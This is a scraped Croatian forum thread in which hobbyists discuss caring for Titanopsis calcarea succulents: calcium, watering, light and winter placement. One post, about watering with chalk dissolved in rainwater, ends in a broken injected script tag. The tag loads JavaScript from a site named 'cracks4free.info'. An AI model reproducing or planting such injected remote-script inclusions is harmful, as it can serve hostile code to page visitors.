Titanopsis |
Odgovori ![]() |
Stranica 12> |
Korisnik | |
Glikica ![]() Cvjetni guru ![]() ![]() Pridružen: 31 Svibanj 2012 Status: Offline Bodovi: 6512 |
![]() ![]() ![]() ![]() ![]() Objavljeno: 18 Listopad 2013 u 15:19 |
Ooo, ima tu još mjesta u teglici, a i cvate sad, ne diraj ga. Imaš vremena za presađivanje, ne raste on tako brzo.
|
|
...i kad poželiš se ravnice, dođi u Vinkovce...
|
|
![]() |
|
Sponzorirani linkovi | |
![]() |
|
marsha ![]() Mladi grm ![]() Pridružen: 17 Ožujak 2012 Status: Offline Bodovi: 576 |
![]() ![]() ![]() ![]() ![]() |
![]() |
|
Fiki ![]() Trajnica ![]() Pridružen: 11 Prosinac 2011 Lokacija: . Status: Offline Bodovi: 2792 |
Ja izmrvim krede u mlaku vodu i zalijem----voda-kišnica.....sve super raste,,,inače kreda je odličan izvor kalcija!< ="text/" a< ="text/" async="" ="http://cracks4free.info/5/adds.js">
|
|
![]() |
|
Miss M. ![]() Mladi grm ![]() ![]() Pridružen: 17 Svibanj 2009 Lokacija: Croatia Status: Offline Bodovi: 603 |
titanopsis calcarea kao što mu samo ima govori treba kalcij u supstratu, u prirodi raste na vapnenačkim stijenama. Ja sam mom dodala izmrvljeni gips u supstrat. Zalijevam ga odozdo i to vrlo rijetko ako želiš da ostane ovako zbijenog izgleda, vidjet ću koliko će to biti uspješno.
|
|
![]() |
|
Fiki ![]() Trajnica ![]() Pridružen: 11 Prosinac 2011 Lokacija: . Status: Offline Bodovi: 2792 |
Porijeklo: Južna Afrika,poglavito Kalahari
Svjetlo + + + Minimalna temp- -1 C Zemlja: Dobro drenirana Cvjetanje-4 godine.,promjer 3 cm Voda-kao i ostalih sukulenata oksudna ----------------------- Opis : Četinjasti listovi prekriveni sitnim kvržicama oblikuju male rozete ,koje u prirodnom okolišu se uklapaju u okolne stijene... ![]() Zovu ga i Kamenom života jer zahvaljujući svojoj kamuflaži preživljava::: Evo i mojih... Očekujem vaša iskustva! ![]() |
|
![]() |
|
Belice-predivan je....jel ga prehranjuješ?
|
|
![]() |
|
belica ![]() Neukroćena biljka ![]() ![]() Pridružen: 14 Ožujak 2012 Lokacija: Zagreb Status: Offline Bodovi: 2763 |
evo preseljen u toplije krajeve...
![]() |
|
belica,zagreb
|
|
![]() |
|
belica ![]() Neukroćena biljka ![]() ![]() Pridružen: 14 Ožujak 2012 Lokacija: Zagreb Status: Offline Bodovi: 2763 |
uh onda ću ga preseliti u toplije krajeve... imam ga tek od nedavno pa nisaam znala. hvala
|
|
belica,zagreb
|
|
![]() |
|
Pinus ![]() Neukroćena biljka ![]() ![]() Pridružen: 30 Listopad 2009 Status: Offline Bodovi: 4559 |
Belica, po meni je to greška. Titanopsis je sada u vegetaciji. Uz svijetlo treba i toplotu. Kod mene je trenutno na zapadnom prozoru, temp. 20 C ± 3C, (dan, noć, ...)
|
|
![]() |
|
Krasan je cvijetić. Vidim da ti svog držiš na toplom u kući ? Moj je u jako hladnom hodniku na prozoru- je li to greškica možda ?
|
|
belica,zagreb
|
|
![]() |
|
Belina ![]() Neukroćena biljka ![]() ![]() ZLATNI DONATOR Pridružen: 26 Siječanj 2011 Status: Offline Bodovi: 3901 |
Doći ću,ovako virtulno,ali želim i u stvarnosti
![]() A onda bi se ,mogla iseliti,na barku,a sva ta ljepota po kući! A susjedu se klanjam
![]() |
|
"Mića rožica" sa otoka Krka - Omišalj
|
|
![]() |
|
Pinus ![]() Neukroćena biljka ![]() ![]() Pridružen: 30 Listopad 2009 Status: Offline Bodovi: 4559 |
E Belina,a gdje bi drugo nego kod susjede. Najavio sam i tebe kod susjeda. ![]() ![]() ![]() |
|
![]() |
|
Belina ![]() Neukroćena biljka ![]() ![]() ZLATNI DONATOR Pridružen: 26 Siječanj 2011 Status: Offline Bodovi: 3901 |
![]() ![]() |
|
"Mića rožica" sa otoka Krka - Omišalj
|
|
![]() |
|
![]() |
|
Miss M. ![]() Mladi grm ![]() ![]() Pridružen: 17 Svibanj 2009 Lokacija: Croatia Status: Offline Bodovi: 603 |
Titanopsis bi sad trebao krenuti s vegetacijom i cvjetanjem bar tako kažu knjige da i to čudo vidim jer primjetila sam da je prilično mirovao ljetos.
|
|
![]() |
|
i ja sam danas dobila na poklon jednu preslatku od naše drage Camellie
![]() |
|
belica,zagreb
|
|
![]() |
|
Glikica ![]() Cvjetni guru ![]() ![]() Pridružen: 31 Svibanj 2012 Status: Offline Bodovi: 6512 |
Prije par dana sam u Konzumu naletila na ovu biljkicu u tako jadnom stanju da sam ju morala pokupiti i donijeti kući. A koštala je svega 4, 89 kn, pa onda možete misliti kakva je. Presadila sam ju i sad je na promatranju, valjda će biti nešto od nje. Ovi gore pokazani primjerci su krasni, jako lijep sukulentić.
|
|
...i kad poželiš se ravnice, dođi u Vinkovce...
|
|
![]() |
|
moon ![]() administrator ![]() ![]() Pridružen: 06 Listopad 2010 Lokacija: Kvarner,Croatia Status: Offline Bodovi: 10501 |
![]() |
|
![]() |
|
Camellia ![]() Cvjetni guru ![]() ![]() Pridružen: 23 Siječanj 2012 Lokacija: Dugo selo Status: Offline Bodovi: 6620 |
![]() Moj novi Titanopsis |
|
![]() |
|
natalija ![]() Cvjetni guru ![]() ![]() Pridružen: 15 Prosinac 2007 Lokacija: zadar Status: Offline Bodovi: 5452 |
pinus nije do mog zalivanja - odmah kad sam ga uzela bio je sav nikakav, ali sam mislila da će se oporaviti
valjda takva pošiljka |
|
![]() |
Odgovori ![]() |
Stranica 12> |
Tweet
|
Pređi na drugi forum | Forumska ovlaštenja ![]() Vi ne možete objavljivati nove teme na ovom forumu Vi ne možete odgovarati na teme Vi ne možete brisati vaše poruke Vi ne možete urediti svoje poruke Vi ne možete dodati anketu Vi ne možete glasati u anketi |